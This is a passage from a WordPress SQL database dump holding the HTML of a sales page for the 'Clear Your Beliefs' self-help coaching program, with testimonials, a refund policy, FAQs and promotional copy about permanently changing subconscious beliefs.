src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-07-08 09:13:36', '2015-07-08 14:13:36', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2222, 2, '2015-07-08 09:10:39', '2015-07-08 14:10:39', '<h3 class="widget-title">Video and welcome text</h3>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h3 class="widget-title">Ebook button</h3>			<h1><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="alignleft size-medium wp-image-1475" /></a><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you 